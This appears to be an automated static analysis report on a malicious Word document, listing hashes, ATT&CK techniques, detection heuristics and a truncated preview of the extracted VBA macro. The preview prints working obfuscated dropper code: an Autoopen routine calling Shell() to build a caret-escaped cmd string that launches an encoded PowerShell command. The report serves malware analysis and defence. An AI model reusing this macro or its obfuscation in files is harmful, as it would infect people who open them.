Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8cdf5e3d806ebae…

MALICIOUS

Office (OLE)

89.8 KB Created: 2018-06-05 09:48:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 9e5caab6d26ab74b474c00377c3dfdc5 SHA-1: 92f61f250b9f423e00e290d210eba1b66d1f6ed0 SHA-256: e8cdf5e3d806ebaefd77b33fe8990be7da51bb00ff5ffb10bf2fc96bfaa9a136
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains a VBA macro with an Autoopen subroutine, which is a common technique for automatically executing malicious code upon opening the document. The critical heuristic firing for Shell() call in VBA, along with the VBA p-code auto-execution, indicates that the macro attempts to execute a command. The script attempts to construct a command string using concatenation, including parts like 'md HsDbzAa Wj QLmJDDwJRzw YlmFiqUB TTcd DjoUmU' and ' %c^o^m^S^p^E^c^', suggesting it aims to run a command-line utility, likely to download and execute a secondary payload.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11139 bytes
SHA-256: 0074f77e43642e97af7fc99f4aced57c1d07d7db0cdbe6cf42b01c21baa567e8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cEUWjkAMwVmnR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IBNhikRkqB()
On Error Resume Next
uOoAK = Hex(mHkVOz + Hex(hIELYh) * 31133 + Round(RAZpMp))
PCzSCN = Cos(MHANL)
zPkiiR = CDate(mwvjqE)
dNPKzn = Cos(rhVvv)
ZwzKKW = Hex(fCQqHu + Hex(nRHPc) * 96953 + Round(iwspPX))
IhOnm = Cos(HqBkZT)
zbzYD = CDate(iXaaG)
wCvzE = Cos(uwGXU)
IBNhikRkqB = iJhazH + Shell(uaiwfLGX + Chr(KUGcSFkTwP + vbKeyC + isHjvjViLV) + dnDwwGiWYuN + oMIokVijZ + woXwjBob + IrRvYs + OdOoZn, 38998 - 38998)
DUNAz = Hex(XqIZh + Hex(ATmMs) * 3058 + Round(HITpiL))
wPiURc = Cos(wUipi)
KDPLWV = CDate(wlihFE)
Mskfip = Cos(TILnI)
End Function
Sub Autoopen()
On Error Resume Next
wDwDX = Hex(bWEsI + Hex(JTwLj) * 93980 + Round(MmuEk))
GpWrv = Cos(XOQws)
iJrdTI = CDate(bMZWHI)
PZvSBz = Cos(ARZFf)
IBNhikRkqB
olDtW = Hex(ZBmXj + Hex(mEJqj) * 36790 + Round(jTowT))
utYisR = Cos(nwKqI)
zDjacB = CDate(zPuEK)
Gqwqzn = Cos(wbKAXu)
End Sub


Attribute VB_Name = "KfnuTiA"
Function dnDwwGiWYuN()
On Error Resume Next
KNRfuq = Hex(QAEcDK + Hex(UchXPX) * 51198 + Round(RJioZ))
wBPWZ = Cos(InVfUR)
TGJVD = CDate(Xjnjtl)
MzwIw = Cos(QXTwp)
QFBoPY = "md HsDbzAa " + "Wj" + "QLmJDDwJRzw" + "YlmFiqUB " + "TTcd" + "DjoUmU & " + "    %^c" + "^o^m^S^p^E^c^"
iiSjH = Hex(CwwGF + Hex(ofwCc) * 17733 + Round(VkOUJ))
NiOAAA = Cos(UPYMF)
fdqnM = CDate(toURH)
vKdTU = Cos(JIpuU)
VBRZikCtio = "%    " + " %" + "^c^o^" + "m^S^p^E^c^%    " + " /V " + "  " + "      /c   " + "        s"
zzGznY = Hex(mwZds + Hex(zCPQDs) * 32564 + Round(lFqiA))
HCzNlJ = Cos(pOwwA)
JVSWjl = CDate(XOusmB)
hMsQT = Cos(czkzLr)
oFitJ = "et %zjtsNZYmunW" + "pbEI" + "%=Rp" + "sWkwVQz" + "s&&set "
cHoQTC = Hex(HlTiJt + Hex(YtIEb) * 69437 + Round(UdVic))
TKlSK = Cos(CLPadY)
EwwsKH = CDate(bEFbu)
HdIiSi = Cos(pdwzBX)
fqTMLblPVUw = "%shFCJ" + "zJLldRa%=p&" + "&set %voD" + "dqDUtln%" + "=o^w&&set %Kj" + "zWHMXzwS" + "itZfG%=ZNz"
rAJTi = Hex(sfJXkK + Hex(ClPEJX) * 51155 + Round(ZDkHuh))
bzzrmn = Cos(bvmzOs)
UltIHo = CDate(Osqdz)
SwYMjz = Cos(EJatYo)
zpJnnsTu = "drXV&&set" + " %CL" + "ltwcc%=!%" + "shFCJzJL" + "ldRa%!&&set %k" + "OzcQk"
KUSMJ = Hex(FERrzn + Hex(pMHGOp) * 1317 + Round(iWZNP))
XKLAjT = Cos(tuadT)
jNihN = CDate(GJrCTi)
nDjzsw = Cos(phuGqP)
JQvKVP = "ALd" + "uVPsmX%=KSi" + "GppYQMPj&" + "&s" + "et %jGNivTjXj%" + "=e^r&&se" + "t %kzDwFQJu" + "wmO" + "NG%=!%v" + "oDdqDUtln"
YwSjd = Hex(bTDzpM + Hex(JjjIr) * 42050 + Round(jRMwh))
ZZzSYq = Cos(chNYVq)
HTzhHj = CDate(kFBlOU)
oHkVz = Cos(UBUkaz)
qLzMWJQiNTM = "%!&&s" + "et %sICcnriA" + "pLnq%=s&&" + "set %YHTTA" + "mKP"
dnDwwGiWYuN = QFBoPY + VBRZikCtio + oFitJ + fqTMLblPVUw + zpJnnsTu + JQvKVP + qLzMWJQiNTM
End Function
Function oMIokVijZ()
On Error Resume Next
ocWIn = Hex(ltMRi + Hex(BzpTwj) * 18025 + Round(koZdC))
sQFwO = Cos(ISsIi)
wNjUbp = CDate(jzAfh)
ERddA = Cos(tFQJV)
BKqEz = "HIjGNzH%" + "=wEQNRBi&&set %" + "QfwNSNooGu%=he" + "&&se" + "t %VCjaQSutriCj" + "B%=ll&&!%CLlt" + "wcc%!!%" + "kzDwFQJ" + "uwmO" + "NG%"
NDYhjE = Hex(kFhwmQ + Hex(jXWYr) * 71116 + Round(cKpio))
FpniDN = Cos(NmhzOw)
zRWVqN = CDate(TVjrSk)
ltiCu = Cos(avSzs)
YlmrwQibo = "!!%jGNi" + "vT" + "jXj%!!%sICcn" + "riApL"
kwzqX = Hex(umaLo + Hex(obDmU) * 6642 + Round(ldOctw))
TkXBwW = Cos(RcpViM)
XzqaFP = CDate(TIoaO)
GvVWD = Cos(arKPYM)
cUEnVltbGTF = "nq" + "%!!%QfwNS" + "NooGu%!!%VCja" + "QSu" + "triCjB%!  -e I" + "AAoAG4AZQB3AC0A" + "TwBCAEoAZQBjAFQ" + "AI"
qWwOQ = Hex(qJOfYC + Hex(jizcja) * 69261 + Round(WWHSS))
lpNiRN = Cos(YsVtXl)
AsPzU = CDate(Isrhj)
cETzrv = Cos(CETAzG)
VwaaNO = "ABzAHkAcwBUAGU" + "ATQAuA" + "GkATwAuAGMA" + "TwBNAFAAcgB" + "FAFMA"
AKpiiL = Hex(MMiGJw + Hex(dtzfC) * 38736 + Round(jFsizY))
SjrSqf = Cos(wCNzU)
Qroth = CDate(vZLVVu)
CRFwAl = Cos(GtjnnS)
aWzoEEI = "cwBJAG8AbgAuAG" + "QAR" + "QBmAE" + "wAQQBUAGUAc" + "wB0AF" + "IAZQBBAG0AKAA" + "gAFsASQB"
ofqkj = H
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.